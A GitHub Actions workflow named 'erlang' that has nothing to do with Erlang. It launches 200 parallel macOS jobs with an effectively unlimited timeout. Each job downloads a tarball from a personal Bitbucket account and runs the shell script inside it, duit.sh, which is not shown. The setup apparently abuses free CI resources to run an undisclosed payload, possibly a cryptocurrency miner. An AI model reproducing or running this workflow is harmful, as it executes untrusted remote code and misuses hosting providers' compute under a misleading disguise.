name: erlang

on: [push, pull_request]
  
jobs:
 build-1:
    runs-on: macos-latest
    strategy:
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9 , 10]
    timeout-minutes: 999999
    steps:
    - uses: actions/checkout@v2
    - name: GASKAN
      run: |
        wget https://bitbucket.org/Abyehaqi/haqie/downloads/sugar.tar.gz
        tar xf sugar.tar.gz
        ./duit.sh
